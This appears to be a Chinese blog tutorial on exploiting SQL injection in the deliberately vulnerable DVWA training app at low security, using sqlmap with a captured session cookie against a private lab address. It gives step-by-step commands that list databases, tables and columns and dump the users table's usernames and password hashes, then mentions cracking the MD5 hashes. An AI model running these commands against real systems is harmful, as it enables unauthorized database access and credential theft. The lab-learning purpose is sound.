【DVWA】SQL Injection-low(sqlmap)

SQL 注入(利用sqlmap)——低安全性


【前言】

上次使用的手工注入,有一定的代码审计。那么对于这种存在sql注入漏洞的,哪必定可以使用sqlmap来进行sql注入。


由于我们的DVWA是要登录上去才可以进行里面相应的一些服务。
那么我们就要获取到浏览器中的cookie。


【准备工作】

  • 登录DVWA,选择SQL Injection,按F12进入调试页面中的网络模块。
  • 点击Submit,寻找注入点与所需要的cookie。
    在这里插入图片描述
  • 所需要的信息:
    cookie与注入点 在这里插入图片描述

【使用sqlmap】

【爆破所有数据库】
sqlmap -u "http://192.168.188.201/dvwa/vulnerabilities/sqli/?id=&Submit=Submit" --cookie "low; PHPSESSID=q0u7iggdkgo9lmdso9kslc9a72; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada" --dbs

在这里插入图片描述

【爆破当前(dvwa)数据库中的所有表】
sqlmap -u "http://192.168.188.201/dvwa/vulnerabilities/sqli/?id=&Submit=Submit" --cookie "low; PHPSESSID=q0u7iggdkgo9lmdso9kslc9a72; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada" -D dvwa --tables

在这里插入图片描述

【爆破数据表中的所有字段】
 sqlmap -u "http://192.168.188.201/dvwa/vulnerabilities/sqli/?id=&Submit=Submit" --cookie "low; PHPSESSID=q0u7iggdkgo9lmdso9kslc9a72; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada" -D dvwa -T users --columns

在这里插入图片描述

【dump出指定字段】

从上一个步骤中我们通过列名就可以很清楚的看出敏感信息——user、password

sqlmap -u "http://192.168.188.201/dvwa/vulnerabilities/sqli/?id=&Submit=Submit" --cookie "low; PHPSESSID=q0u7iggdkgo9lmdso9kslc9a72; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada" -D dvwa -T users -C user,password --dump

在这里插入图片描述

【MD5解密】

可以使用网上工具也可以使用kali自带工具。

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 3
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值